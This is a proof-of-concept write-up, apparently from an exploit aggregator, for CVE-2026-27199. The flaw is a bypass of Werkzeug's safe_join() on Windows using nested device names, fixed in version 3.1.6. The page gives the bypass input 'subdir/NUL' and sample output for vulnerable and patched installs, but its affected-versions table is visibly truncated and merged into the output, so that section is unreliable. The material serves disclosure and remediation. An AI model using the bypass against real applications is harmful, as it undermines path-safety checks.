Share
## https://sploitus.com/exploit?id=B9F1507A-4F0C-570E-BE65-2A55AFFFF33C
# CVE-2026-27199 PoC: Werkzeug `safe_join()` Windows Device-Name Bypass
> **Status:** Publicly disclosed. Fixed in **werkzeug 3.1.6**.
> **Severity:** Moderate
> **Reporter:** [@alimezar](https://github.com/alimezar)
> **Advisory:** [GHSA-29vq-49wr-vm6x](https://github.com/advisories/GHSA-29vq-49wr-vm6x)
---
## Affected Versions
| Package | Affected | Patched |
|-----------|-----------|---------|
| werkzeug | ` **Requires:** Windows, Python 3.8+, `werkzeug None (correctly blocked)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (bypass!)
[*] Attempting to write to the returned path ...
[!] open(nested NUL) write: SUCCESS โ data silently discarded by device
[!] VULNERABLE: CVE-2026-27199 confirmed on this installation.
Upgrade to werkzeug >= 3.1.6 to remediate.
```
### Expected output (patched version)
```
[+] safe_join(base, 'subdir/NUL') -> None (correctly blocked)
[+] NOT VULNERABLE: nested device name was blocked.
```
---
## References
- [GHSA-29vq-49wr-vm6x](https://github.com/advisories/GHSA-29vq-49wr-vm6x) โ this advisory
- [GHSA-hgf8-39gv-g3f2](https://github.com/advisories/GHSA-hgf8-39gv-g3f2) โ prior related advisory
- [GHSA-87hc-h4r5-73f7](https://github.com/advisories/GHSA-87hc-h4r5-73f7) โ prior related advisory
- [Werkzeug changelog](https://werkzeug.palletsprojects.com/en/stable/changes/)
---
*This PoC is published for educational and defensive purposes following responsible disclosure and public patch availability.*